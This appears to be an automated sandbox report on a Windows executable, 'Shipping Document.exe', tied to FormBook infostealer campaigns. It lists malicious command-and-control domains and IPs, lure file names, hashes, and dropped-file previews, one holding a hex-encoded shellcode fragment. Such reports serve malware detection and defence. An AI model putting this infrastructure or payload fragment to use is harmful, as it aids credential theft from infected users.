https://duckduckgo.com/ac/?q=	certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js	certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js	certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/%s/oauth2/authorizeStringCchPrintfWhttps://login.microsoftonline.c	svchost.exe, 00000002.00000003.1621959172.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1621830012.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000003.00000003.1591967021.00000000012BB000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.fasthosts.co.uk/domain-names/search/?domain=$	certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js	certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/	certreq.exe, 00000004.00000002.3986547187.00000000060B6000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003796000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com	certreq.exe, 00000004.00000002.3986547187.00000000063DA000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.00000000066FE000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.00000000071FC000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3986547187.0000000006D46000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.00000000048DC000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003ABA000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004426000.00000004.00000001.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003DDE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.y94hr.top	tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3987001681.00000000056D8000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fasthosts.co.uk/	tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_	certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://static.fasthosts.co.uk/icons/favicon.ico	certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css	certreq.exe, 00000004.00000002.3986547187.0000000006A22000.00000004.10000000.00040000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000004102000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	certreq.exe, 00000004.00000003.1865083289.000000000867D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.fasthosts.co.uk/contact?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_par	certreq.exe, 00000004.00000002.3986547187.0000000006890000.00000004.10000000.00040000.00000000.sdmp, certreq.exe, 00000004.00000002.3988300367.00000000083D0000.00000004.00000800.00020000.00000000.sdmp, tvtoHmZUTcBKRIVpHYXPXI.exe, 00000006.00000002.3984748061.0000000003F70000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.92	www.pharmacielorraine.fr	Germany	47846	SEDO-ASDE	true
185.31.240.240	pricekaboom.com	Estonia	49604	ZONEZoneMediaOUEE	true
203.161.43.227	www.ziontool.xyz	Malaysia	45899	VNPT-AS-VNVNPTCorpVN	true
160.251.148.118	www.busypro.net	Japan	7506	INTERQGMOInternetIncJP	true
142.250.186.51	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
212.227.172.253	www.fruitique.co.uk	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
3.33.130.190	autonomyai.xyz	United States	8987	AMAZONEXPANSIONGB	true
199.59.243.225	www.gamemaster.at	United States	395082	BODIS-NJUS	true
172.67.190.203	www.batchscraper.com	United States	13335	CLOUDFLARENETUS	true
213.171.195.105	www.annahaywardva.co.uk	United Kingdom	8560	ONEANDONE-ASBrauerstrasse48DE	true
38.47.207.149	y94hr.top	United States	174	COGENT-174US	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447908
Start date and time:	2024-05-27 12:18:15 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Shipping Document.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/5@16/11
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 60 Number of non-executed functions: 268
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
06:20:31	API Interceptor	10262451x Sleep call for process: certreq.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.92	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	www.pharmacielorraine.fr/opfh/
	Swift_USD103,700.exe	Get hash	malicious	FormBook	Browse	www.pharmacielorraine.fr/1mw3/
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	www.pharmacielorraine.fr/opfh/
	URGENT BANK ACCOUNT.exe	Get hash	malicious	FormBook	Browse	www.pharmacielorraine.fr/opfh/
185.31.240.240	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	www.pricekaboom.com/opfh/
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	www.pricekaboom.com/opfh/
	URGENT BANK ACCOUNT.exe	Get hash	malicious	FormBook	Browse	www.pricekaboom.com/opfh/
	New Shipping Documents.exe	Get hash	malicious	FormBook	Browse	www.pricekaboom.com/opfh/
	SHIPMENT ARRIVAL NOTICE.exe	Get hash	malicious	FormBook	Browse	www.pricekaboom.com/opfh/
203.161.43.227	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	www.ziontool.xyz/opfh/
	USD46k Swift_PDF.exe	Get hash	malicious	FormBook	Browse	www.infinixx.info/b96t/
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	www.ziontool.xyz/opfh/
	Lcjfuguruhxhrv.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.shortput.top/g09c/
	Purchase Order_17052024.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.shortput.top/05xu/
	URGENT BANK ACCOUNT.exe	Get hash	malicious	FormBook	Browse	www.ziontool.xyz/opfh/
	Purchase Order_21052024.exe	Get hash	malicious	FormBook	Browse	www.shortput.top/05xu/
	m735YSFaZM.exe	Get hash	malicious	FormBook	Browse	www.hellome.buzz/q0r6/
	nPLN.exe	Get hash	malicious	FormBook	Browse	www.shortput.top/05xu/
	New Shipping Documents.exe	Get hash	malicious	FormBook	Browse	www.ziontool.xyz/opfh/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.gamemaster.at	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	Transferencia.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.225
	URGENT BANK ACCOUNT.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	New Shipping Documents.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	SHIPMENT ARRIVAL NOTICE.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
	MV SHUHA QUEEN II.exe	Get hash	malicious	FormBook	Browse	199.59.243.225
www.annahaywardva.co.uk	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	213.171.195.105
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	213.171.195.105
	d35g770B2W.exe	Get hash	malicious	FormBook	Browse	213.171.195.105
	URGENT BANK ACCOUNT.exe	Get hash	malicious	FormBook	Browse	213.171.195.105
	bin.exe	Get hash	malicious	FormBook	Browse	213.171.195.105
	New Shipping Documents.exe	Get hash	malicious	FormBook	Browse	213.171.195.105
	SHIPMENT ARRIVAL NOTICE.exe	Get hash	malicious	FormBook	Browse	213.171.195.105
	G7DzDN2VcB.exe	Get hash	malicious	FormBook	Browse	213.171.195.105
	TS-240514-UF2.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	213.171.195.105
	MV SHUHA QUEEN II.exe	Get hash	malicious	FormBook	Browse	213.171.195.105
www.busypro.net	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	160.251.148.118
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	160.251.148.118
	Transferencia.exe	Get hash	malicious	FormBook, GuLoader	Browse	160.251.148.118
	URGENT BANK ACCOUNT.exe	Get hash	malicious	FormBook	Browse	160.251.148.118
	New Shipping Documents.exe	Get hash	malicious	FormBook	Browse	160.251.148.118
	SHIPMENT ARRIVAL NOTICE.exe	Get hash	malicious	FormBook	Browse	160.251.148.118
	MV SHUHA QUEEN II.exe	Get hash	malicious	FormBook	Browse	160.251.148.118
www.pharmacielorraine.fr	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	91.195.240.92
	Swift_USD103,700.exe	Get hash	malicious	FormBook	Browse	91.195.240.92
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	91.195.240.92
	URGENT BANK ACCOUNT.exe	Get hash	malicious	FormBook	Browse	91.195.240.92

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SEDO-ASDE	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	91.195.240.92
	Offer Document 23.lnk	Get hash	malicious	FormBook	Browse	91.195.240.94
	qtCWL0lgfX.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	Offer Document 24.lnk	Get hash	malicious	FormBook	Browse	91.195.240.94
	Platosammine.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	FRA.0038222.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.123
	ShippingDoc_23052024.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.19
	Forfaldendes253.exe	Get hash	malicious	FormBook, GuLoader	Browse	91.195.240.123
	GXu0Ow8T1h.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	file.exe	Get hash	malicious	CMSBrute	Browse	91.195.240.12
ZONEZoneMediaOUEE	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	185.31.240.240
	quotation.exe	Get hash	malicious	FormBook	Browse	185.31.240.240
	Payment invoice.exe	Get hash	malicious	FormBook	Browse	185.31.240.240
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	185.31.240.240
	quote.exe	Get hash	malicious	FormBook	Browse	185.31.240.240
	URGENT BANK ACCOUNT.exe	Get hash	malicious	FormBook	Browse	185.31.240.240
	SecuriteInfo.com.Win32.PWSX-gen.6793.10953.exe	Get hash	malicious	FormBook	Browse	185.31.240.240
	New Shipping Documents.exe	Get hash	malicious	FormBook	Browse	185.31.240.240
	SHIPMENT ARRIVAL NOTICE.exe	Get hash	malicious	FormBook	Browse	185.31.240.240
	bad.js	Get hash	malicious	Unknown	Browse	217.146.69.54
INTERQGMOInternetIncJP	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	160.251.148.118
	wyZ1vPGwGw.elf	Get hash	malicious	Unknown	Browse	118.27.0.18
	M2Vf6ASl3g.elf	Get hash	malicious	Unknown	Browse	133.130.112.114
	j55aXfhPv3.elf	Get hash	malicious	Mirai, Moobot	Browse	157.7.79.151
	file.exe	Get hash	malicious	CMSBrute	Browse	160.251.107.179
	NEW PURCHASE ORDER.exe	Get hash	malicious	FormBook	Browse	160.251.148.118
	Transferencia.exe	Get hash	malicious	FormBook, GuLoader	Browse	160.251.148.118
	URGENT BANK ACCOUNT.exe	Get hash	malicious	FormBook	Browse	160.251.148.118
	Request for Quotation # 3200025006.exe	Get hash	malicious	FormBook, GuLoader	Browse	118.27.122.214
	RE Draft BL for BK#440019497 REF#388855.exe	Get hash	malicious	FormBook	Browse	118.27.122.214
VNPT-AS-VNVNPTCorpVN	PAYMENT ADVICE.exe	Get hash	malicious	FormBook	Browse	203.161.43.227
	RFQ _ARC 101011-24.exe	Get hash	malicious	FormBook	Browse	203.161.49.193
	URocnz2wNj.elf	Get hash	malicious	Unknown	Browse	113.184.12.157
	3LI2VAvf26.elf	Get hash	malicious	Unknown	Browse	14.161.21.248
	h73eD4sruD.elf	Get hash	malicious	Unknown	Browse	14.250.168.229
	wNJM6XQwaZ.elf	Get hash	malicious	Unknown	Browse	123.30.215.217
	n4WgIM7VfS.elf	Get hash	malicious	Mirai	Browse	123.17.251.239
	http://worker-frosty-surf-7141.parvgee90.workers.dev/favicon.ico	Get hash	malicious	HTMLPhisher	Browse	203.161.57.106
	http://worker-office-onedrive.td5xtn-b1lv7f1ymscd0.workers.dev/favicon.ico	Get hash	malicious	HTMLPhisher	Browse	203.161.57.106
	6T1S0q3QLa.elf	Get hash	malicious	Mirai	Browse	123.31.16.67

Process:	C:\Windows\SysWOW64\certreq.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	modified
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autA2D7.tmp

Download File

Process:	C:\Users\user\Desktop\Shipping Document.exe
File Type:	data
Category:	dropped
Size (bytes):	269312
Entropy (8bit):	7.994088974008671
Encrypted:	true
SSDEEP:	6144:LF7WfCm87IIv7qu2t7zWyhp4sF23/TGgUKWZX9fzTAc/5jr:LJWfkOuuXth7O/TjwzJ5jr
MD5:	A84DEB7D6CE7940B0F03152F0EA11AB6
SHA1:	627F7CD57B0BDF024D1C6590224A8D8CB8E87B18
SHA-256:	4114533EACAA451D68D5891A6CBE437183452DC947EB6C1B69DF3D4CBABA291F
SHA-512:	EB4E91CD76588252DADF9E73985385532E12611F50C240694D5D07119DBDCAF84651EE43A73F369F2A1D432CB47DA818736D3D2C93F9C708F5256E271AD136BE
Malicious:	false
Reputation:	low
Preview:	.b...HX1J..;.....L3...bTY...FTX8UL0HX1JWQI2KFTX8UL0HX1JWQI.KFTV'.B0.Q.k.P..j.<1Ku<B'?C+:q*S%(;,.7).:-_j>?iv..t5W1).EU;nWQI2KFT!9\..(?.w76..+!.B....(?.P....+!.B....(?..>2!.+!.X8UL0HX1..QI~JGT.kn.0HX1JWQI.KDUS9^L0B\1JWQI2KFT(,UL0XX1JwUI2K.TX(UL0JX1LWQI2KFT^8UL0HX1JwUI2IFTX8UL2H..JWAI2[FTX8EL0XX1JWQI"KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTvL04DHX1._UI2[FTX2QL0XX1JWQI2KFTX8UL.HXQJWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1

C:\Users\user\AppData\Local\Temp\autA317.tmp

Download File

Process:	C:\Users\user\Desktop\Shipping Document.exe
File Type:	data
Category:	dropped
Size (bytes):	9906
Entropy (8bit):	7.596339518487682
Encrypted:	false
SSDEEP:	192:eyaFcTokbCKr+mfv76SgtVppx6RAbhBJPIHXnaT+vcYKIl363H+:AFxkeU+m2SgnppURYhBJ+3aCvcYKI2+
MD5:	4277BAF7B7E83058011EC939759D8E4C
SHA1:	E4843A2380BDDD6D5C8511845EEE757868FFE189
SHA-256:	9AB04BC5B9205109CE4DB22C561755A67CE2C76911B09BE4BED78AAAE22ED0D6
SHA-512:	D2E424E52AACFE2D40CC5E579DD8FEB679D67A04B7B7706E3677CDEE8ADE1A07E661D5A67B537C5A3FC21356CA39FFEEFBA8D15FC3E318560012CB0DA17E5EE7
Malicious:	false
Reputation:	low
Preview:	EA06..t4.M(...aD..fT)..D.Mh.z,.gA....5.......B.Mh..%.mF.Mf....qb.....-..c.L...$.m5...k..c0.M....k8.X.3i...l..%.o2....A8.6,.........3k....e.N&s0.oNf.)...k.K$.eb....5..f.........6.0.o.p....l39....V0...S..$.if...6....f.I...@.....i8........X@.4.1..........$.P...0z.5..$}3Y.....=5..`d....!d..V...7f.[$..8...\|.I..W.d...\|vI..W.d...\|vK..W.d...\|vK(.W.e...\|vY..W,.O...k.`..X@..9..^.8..F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn.

C:\Users\user\AppData\Local\Temp\soliloquised

Download File

Process:	C:\Users\user\Desktop\Shipping Document.exe
File Type:	data
Category:	dropped
Size (bytes):	269312
Entropy (8bit):	7.994088974008671
Encrypted:	true
SSDEEP:	6144:LF7WfCm87IIv7qu2t7zWyhp4sF23/TGgUKWZX9fzTAc/5jr:LJWfkOuuXth7O/TjwzJ5jr
MD5:	A84DEB7D6CE7940B0F03152F0EA11AB6
SHA1:	627F7CD57B0BDF024D1C6590224A8D8CB8E87B18
SHA-256:	4114533EACAA451D68D5891A6CBE437183452DC947EB6C1B69DF3D4CBABA291F
SHA-512:	EB4E91CD76588252DADF9E73985385532E12611F50C240694D5D07119DBDCAF84651EE43A73F369F2A1D432CB47DA818736D3D2C93F9C708F5256E271AD136BE
Malicious:	false
Reputation:	low
Preview:	.b...HX1J..;.....L3...bTY...FTX8UL0HX1JWQI2KFTX8UL0HX1JWQI.KFTV'.B0.Q.k.P..j.<1Ku<B'?C+:q*S%(;,.7).:-_j>?iv..t5W1).EU;nWQI2KFT!9\..(?.w76..+!.B....(?.P....+!.B....(?..>2!.+!.X8UL0HX1..QI~JGT.kn.0HX1JWQI.KDUS9^L0B\1JWQI2KFT(,UL0XX1JwUI2K.TX(UL0JX1LWQI2KFT^8UL0HX1JwUI2IFTX8UL2H..JWAI2[FTX8EL0XX1JWQI"KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTvL04DHX1._UI2[FTX2QL0XX1JWQI2KFTX8UL.HXQJWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1JWQI2KFTX8UL0HX1

C:\Users\user\AppData\Local\Temp\thixophobia

Download File

Process:	C:\Users\user\Desktop\Shipping Document.exe
File Type:	ASCII text, with very long lines (29748), with no line terminators
Category:	modified
Size (bytes):	29748
Entropy (8bit):	3.5465806603192185
Encrypted:	false
SSDEEP:	768:ViTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbQE+I+h6584vfF3if6gP:ViTZ+2QoioGRk6ZklputwjpjBkCiw2R+
MD5:	E10F06FD73FB0CC2ED6E02DA9B88FE88
SHA1:	1E58B338766D9DFE94D0879540AD00F356B70E74
SHA-256:	3EFE598C6C48F54F7CDCB70BC34E14F2A09E2C6A12B48D991BF98D96F272F422
SHA-512:	F5918E896F6F2C788A1DCDBEA03161DDE00EC8BD6258A9F86CEEE1C5F449146EBEE48BB00EF4183981A1763AF347EF960D0952787E3F61F7AB1D81735D1C1CC0
Malicious:	false
Reputation:	low
Preview:	84F98E0D192B10FD05E7E43AEF7957D5930866ABD5D0DA6FF50x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c0000

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.099246803162921
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Shipping Document.exe
File size:	1'153'024 bytes
MD5:	d6e393603c46c4152ea7603ff047af86
SHA1:	664cfe9fa1b0df9d616d4158bb0b5742e62a1756
SHA256:	a70008d95ba3e813cd35c1c663aa46c3cf6c95eeaeccbfbdeb18597daec36647
SHA512:	b6a94caa7f7da85cd3297af6168f9ce4fb50fd52cf9575d47b5f748d205f41f879f6ae4a0d007064a1aeb4e01bfb90c4659f7036cba826e97bfb76428cc69d6a
SSDEEP:	24576:uAHnh+eWsN3skA4RV1Hom2KXMmHacLoBPr+yZU3BSy5:Zh+ZkldoPK8YacLoxr+yZ+X
